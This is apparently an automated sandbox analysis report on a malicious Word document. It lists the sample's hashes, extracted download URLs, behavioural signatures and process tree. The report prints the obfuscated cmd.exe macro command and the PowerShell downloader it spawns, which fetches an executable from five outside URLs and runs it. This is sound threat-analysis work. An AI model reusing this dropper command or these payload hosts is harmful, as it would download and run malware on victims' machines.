Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 18:19
Behavioral task
behavioral1
Sample
5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc
-
Size
126KB
-
MD5
5ac1e88265ded3e67477cce519906e50
-
SHA1
725f2a559f053ca645caa64f83e267f101474576
-
SHA256
8e8423332fc3be61a54a2d4f2faaa5d0fac4de05af71a5fabbac0adac89d3456
-
SHA512
72010c07a9ef5ea23e2d3e088c3c420c233ff5aa3d7c9b4bb6c7f453d8edda6c7a6787e461e57c441c2ad27170d12ca6343228d6c47597c24991bfbe56c6c99d
-
SSDEEP
1536:8ptJlmrJpmxlRw99NBu+aFKUI4BxanVldfalV0UQwGZJCVwbGOrXWy:cte2dw99f1IkbLiNXy
Malware Config
Extracted
http://www.knamanpower.com/U
http://www.flanaganlaw.com/wkM
http://lakecomoholidayapartments.com/uxbCg173
http://farkop27.ru/uEEhY0
http://juegosaleo.com/iu8xL5T1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 528 2492 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 27 2980 powershell.exe 30 2980 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 528 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2492 WINWORD.EXE 2492 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2980 powershell.exe 2980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2980 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2492 WINWORD.EXE 2492 WINWORD.EXE 2492 WINWORD.EXE 2492 WINWORD.EXE 2492 WINWORD.EXE 2492 WINWORD.EXE 2492 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2492 wrote to memory of 528 2492 WINWORD.EXE cmd.exe PID 2492 wrote to memory of 528 2492 WINWORD.EXE cmd.exe PID 528 wrote to memory of 2980 528 cmd.exe powershell.exe PID 528 wrote to memory of 2980 528 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SYSTEM32\cmd.execmd /V/C"^s^e^t ^w^7=^8^7^_^ ^q*^j^ ^'4^7^ C^ ^z^ ^b^Z^S^ ^m^?^e^ n^{( Jv^|^ ^p^S^E^ ^<^+{^ (^'^W^ ^z^0^ ^ ^:^M^3^ ^J^L^U^ ^J^d^[^ ^T^.^Z^ ^,Z^m^ ^xN^\^}^{^o^6^}^Z^`V^{^t^1^u^h^A^8^7cP^;^9^t%R^F^aC^7^mcs^=^4^}/^d^*^;^.^wU^k^a^'^{^a^@'^`^eP^8^Kr^;X^D^b/^$^Z^;^i^kc^DC^B^]V^6^T^-z^8^j^h^$N^d)^ ^Y^:^Om^.^f^:^e^:^JC^t*^]^d^I^Q^d^p^-^x^B/^ep^&^F^k^*^8^\^o^:^w^Zv^mv^-n^s(^*^Imr^;^;1^T^')^mN^ ^D^L^MCV^`^]^#^z_^B^f^$]^x^z^ (^2^~^,^'^g^u^t^eC^:^Zz^AkN^T^k^W^$a^_^;(^$^p=^e^|/^&^l^|m^G^i^[^|^z^F^9^S^_^d^G^;^,^a^m^J^'^o^|e^5^l^]^5^_n^t^X^`^w^yR%^o^=^DR^D^;^D^j^.^E^h^9^I^]^<^'d^b^[^zw^W^i^~^$H^q^b^{^<^T^]^y^>^U^Er^:^q^e^tV)^s^{^E^|^i)^0^mA^z^k^;^&^zy^&^8^M^_^ER^$^Z^HR^ ^Z^dRn(w^I^i(^>^e^ ^;^1)^t^3^B^o^Z^bc(N^x^G^k^$^&^Q%(^M^b/^h/^;(c^x^[^1a^U^-[^e^7^a^Yr^B^uz^o^[^Y^9f^:^@^[^;^L^Z^|^'n^.^$^e^6;Kx^AR^u^e^t^A^G^.^-^@^1^'^5^Y^a^+c^m^[Z^Zr^Y^tV^#^:^b^m^2^w^$^7^I(^+C^W^;^'^f^ ^g^\^;^13^'(^H^h^+^\^:^Ac^@^{^o^iB^`5^l^fq^:^bV^0^T^uc^y^Up^H_^x^:^Z^p^$v^b^2^&n^p^I^?e^L^`^t^$^-^w^]^=^jD^Q^D^{^f^GV%^9^E^z^@^J)^$^AN^T^;%^x`^'/^&^~0^7n^?^1W^Q^]1^Y^g^G^'^t^=^J^ ^E^$^-^=^d^X^U^ ^U^<^m^Z^K^Gxt^Y^T^`b^y^L^_^$^3^O^G^;^y^IC)^p^6^F^'^,T^A^@x^EN^'^p^[^G(^xg^s^t^`^o^>^i^u(^M^lu^wy^p^o^G^;^S^;^sG^.^,5^E^'vu^l^1^-v^3^T^eC^+5^Q^yn^L^2^mAx^w^~^<^8^XN^}^u^[^<r^i^W^_v/^B^]^h^m^-(^'^o^Z^d%c^En^5^.^4CR^o^y^H^l^e^U^e^a^l^b~^x^a^>^a^Q^sv^P^<^o^JV^<^g^k^&^eer^8^k^u^W^g^h^j^bT^@/^<^{^:/^K^S(^:^.v^'^pN^F^p^tl^E^yt^ ^J^s^h^Ic^'^@^lI^-^0(^Q^3^Y@lm^h^$^4^L^E^9^p^7^Ey%^S^u^*Em/^y^T^i^u(^+/r^d^g^h^.^\^_^'^7^3^G^4^2^7^J^m^p^$^p^d^o^X^Y^z^k^M^.^lr^'^B^a^a^_R^X^f^?^|^m/)^D^;/^]^m^0^:^S^i^q^p^q)^0^t^0^u^|^t^O^4^H^h^.Br^@^2^u^F^3^6^9^=^7^{^ ^J^1^Z^:^I^g^|^@^IC^O^S^6^b^k^G-^x^l^W^u^u^W^1^ /^0^Q^9^m^G^#^J^o^i^&/c^H^*^f^.^d^}^Hs^>F^G^t^_^enn^X(^e^e^}^J^?^m(^O^u^t^A/nr^~h^j^a^w^,^*p{V^B^a^2^A^E^y^B^z^X^a^FC^4^d^>^K^=^iS^+^#^lcC^?^o%^l^G^h^:^Z%^o^p^`v^m^@^-^e^o^o^,acL^}^s^e^q0v^k^-^>^<^a^Q)^T^l)^:N/^3^a^O/V/g^:^g^i^\^p^U^I^O^t^\^:V^t^@z^'^h^Dn^7^@^H^Y(^M^y^I^Y^k^{v^U^w^p^b^i/^K^l^km^_s^L^o^U^d^@c^i^M^s.^-^K^J^w^o^F^W^a^W^:^8^l^g^O^0n^w^l^s^a^8^k^ ^g^ZC^u^a^}/^bnc^s^A^a(^W^A^l^J^g^z^f^&^>^;^.^~^,^G^w^h^8^L^w7^p^I^w^e^Y^b/,^Y^m/^y^Q^7^:)^&^>^p^U(^a^t^L^|^$^t^]^t^l^h^P^:^;^@^u^B^'^U^z^W^o/^2^L^w^m^,^q^\o^+P*c^&N^I^.^Y^#rr^0^|)^e^\^4^l^w$^~^e^or^_^|^p^d^,^ln=^E^Ka%E^Bm^z^q^*^a^<^;^>nJv^,^k^\R^d^.^a^d^q^w^Tc^W^w^=^a^?^w^`^0^./^|^t^j/^l^t^-^:^?~^W^p^8^\V^t^*^;{^tn^t^,^hrj^J^'^]^D^U^=^Q^8^.^z^:O^Q^z^s^B^S^M^ev`^$^hSC^;^65+^t^yn^dn^7T^6^e^si^G^i^U^Q)^l^T^,^7C^9^J^7^b^~N^t^eZ^\^}^WR^Dv.^0^G(^t^uv^8^e^`^D^&N^*^]6^ ^Hl^'^t^X^e^8c^iC^g^e^@^B^K^j^ ^}R^bc^-^d^o\^$^&^-^'^>^2^w^h^g^I^eV^-^tn^A^>^e^=r^H^U^I^sn^7^d^[^l^~w^A^MF^$^$8^: ^B^9^}^l^`^q^1^l^;^&)^e^4^}^E^h^,^*^ ^sN^sVr^Z^]^~^e^WT^k^w^6R^0^o^Z^Fz^p&&^f^or /^L %C ^in (^1^4^9^1^,^-^4^,^3)^d^o ^s^e^t ^D^b^4=!^D^b^4!!^w^7:~%C,1!&&^i^f %C ^l^e^q ^3 c^a^l^l %^D^b^4:^*^D^b^4^!^=%"##2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $wdI=new-object Net.WebClient;$Mzz='http://www.knamanpower.com/U@http://www.flanaganlaw.com/wkM@http://lakecomoholidayapartments.com/uxbCg173@http://farkop27.ru/uEEhY0@http://juegosaleo.com/iu8xL5T1'.Split('@');$btZ = '110';$zVD=$env:public+'\'+$btZ+'.exe';foreach($NZt in $Mzz){try{$wdI.DownloadFile($NZt, $zVD);Invoke-Item $zVD;break;}catch{}} ##3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD541d9f8321bbd35aaf891f3b7bac060df
SHA158da7c06501159f4c7b909d59abc23152e8372ad
SHA25629457444b7268825b17399a00ce19fcd9ecd6647b936f229c8ca2bb35ea4ca64
SHA5125a23e2e3bd6713d0a66eb8ca74ac5ae878c549e20eb1d18423d7afa739d431685ebe0f66a8bf730c7b8188baaaedebe321294269de3e35e6b91bd07189803960